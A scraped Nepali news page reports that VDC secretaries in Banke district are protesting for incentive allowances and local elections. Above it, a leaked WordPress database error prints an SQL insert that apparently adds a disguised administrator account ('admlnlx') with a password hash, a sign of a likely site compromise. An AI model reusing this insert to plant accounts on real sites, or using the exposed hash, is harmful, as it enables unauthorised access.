WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BK2DdJkjsjSYQN4jLE4BC7LvTkzPcR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:24:48', '', 'admlnlx', 'admlnlx')
नेपालगन्ज ,माघ २१-
कार्य सम्पादनमा आधारित प्रोत्साहन भत्ता पाउनुपर्ने माग राखेर बाँके जिल्लाका गाविस सचिवले यहाँ आन्दोलन थालेका छन्।
उनीहरुको आन्दोलनपछि यहाँका सबै गाविस कार्यालयको कामकाज ठप्प भएको छ भने काम लिएर गाविस कार्यालय पुगेका सेवाग्राहीले हैरानी बेहार्नुपरेको छ।
विगत १५ वर्षदेखि हुन नसकेको स्थानीय तहमा जनप्रतिनिधि बहालीका लागि स्थानीय तहको चुनाव हुनुपर्ने, सचिवलाई सरकारबाट गतवर्ष स्वीकृत भएको प्रोत्साहन भत्ता तुरुन्त उपलब्ध गराउनुपर्ने लगायतका माग सचिवले राखेका छन्।
गाविस सचिव हकहित संरक्षण केन्द्र बाँकेका अध्यक्ष उत्तमसिंह सोढीले आन्दोलनको कार्यक्रम अन्तर्गत आज जिल्ला विकास समितिमा धर्ना दिइएको बताए।